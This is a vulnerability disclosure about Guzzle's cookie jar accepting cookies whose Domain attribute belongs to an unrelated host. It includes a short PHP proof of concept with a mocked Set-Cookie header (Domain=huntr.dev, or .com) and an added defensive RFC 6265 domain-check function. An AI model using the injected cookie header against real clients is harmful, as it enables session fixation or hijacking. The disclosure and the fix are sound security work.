Set cookie for different domain in guzzle/guzzle
May 9th 2022
Guzzle's cookie jar does not check whether the Domain attribute of a cookie received via the Set-Cookie header matches the domain of the server that sent the response. A response from one host can therefore store a cookie scoped to an unrelated domain, and the client will send that cookie on later requests to that domain.
Proof of Concept
<?php
require "vendor/autoload.php";

// Client with a cookie jar enabled, so Set-Cookie headers from responses are stored.
$client = new \GuzzleHttp\Client(["cookies" => true]);

// The mocked endpoint answers with a Set-Cookie header whose Domain is not beeceptor.com.
$client->request("GET", "https://<id>.free.beeceptor.com/setcookie");

// Dump the jar: the cookie for the foreign domain has been accepted.
$cookies = $client->getConfig('cookies')->toArray();
print_r($cookies);
You can use beeceptor to mock the endpoint; add the following header to the mock's response:
"Set-Cookie": "poc=1; Domain=huntr.dev"
It also works with .com as the domain, which would cause the cookie to be sent to every .com domain.
The vulnerability is capable of stealing sessions if the right conditions are met.
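The check that is missing in the scenario above is the domain-match rule of RFC 6265 (section 5.1.3 and step 6 of section 5.3): a response from a host may only set a cookie whose Domain attribute equals the host or is a parent domain of it, and public suffixes such as "com" must be refused. The following PHP is an added illustration of that rule written for this page; it is not the reporter's code and not Guzzle's implementation. The function names `cookieDomainAllowed` and `setCookieDomain`, the host `example-id.free.beeceptor.com` (standing in for `<id>.free.beeceptor.com`) and the sample Set-Cookie values are all constructed for the example.

```php
<?php
// Added example (not from the report or from Guzzle): the RFC 6265 domain-match
// check a cookie jar should apply before storing a cookie from a response.

/**
 * True if a response from $requestHost is allowed to set a cookie whose
 * Domain attribute is $cookieDomain.
 */
function cookieDomainAllowed(string $requestHost, string $cookieDomain): bool
{
    $host   = strtolower(rtrim($requestHost, '.'));
    $domain = strtolower(trim($cookieDomain, '.'));

    // No Domain attribute: host-only cookie, always fine for the origin host.
    if ($domain === '') {
        return true;
    }

    // IP addresses must match exactly; there is no suffix matching for IPs.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host === $domain;
    }

    // Bare top-level labels such as "com" are public suffixes and must be refused.
    // A complete implementation consults the Public Suffix List here; this
    // minimal guard only covers the ".com" case the report describes.
    if (strpos($domain, '.') === false) {
        return false;
    }

    if ($host === $domain) {
        return true;
    }

    // Suffix match with a dot boundary: "a.example.com" matches "example.com",
    // but "notexample.com" does not.
    $suffix = '.' . $domain;
    return substr($host, -strlen($suffix)) === $suffix;
}

/** Extract the Domain attribute from a raw Set-Cookie value ('' if absent). */
function setCookieDomain(string $setCookie): string
{
    foreach (array_slice(explode(';', $setCookie), 1) as $attr) {
        $parts = explode('=', trim($attr), 2);
        if (strcasecmp($parts[0], 'Domain') === 0 && isset($parts[1])) {
            return trim($parts[1]);
        }
    }
    return '';
}

// Constructed sample: the host from the report and several Set-Cookie values.
$requestHost = 'example-id.free.beeceptor.com';
$headers = [
    'poc=1; Domain=huntr.dev',           // unrelated domain: reject
    'poc=2; Domain=.com',                // public suffix: reject
    'poc=3; Domain=free.beeceptor.com',  // parent domain of the host: store
    'poc=4',                             // no Domain attribute: host-only, store
];

foreach ($headers as $h) {
    $allowed = cookieDomainAllowed($requestHost, setCookieDomain($h));
    printf("%-36s -> %s\n", $h, $allowed ? 'store' : 'reject');
}
```

Run with `php check.php`: the first two headers are rejected, the last two are stored. A jar that applies this check before `setCookie()` stops a response from `<id>.free.beeceptor.com` from planting a cookie for `huntr.dev` or for every `.com` host; rejecting single-label domains is only a stopgap for the public-suffix problem, and a real client should use the full Public Suffix List.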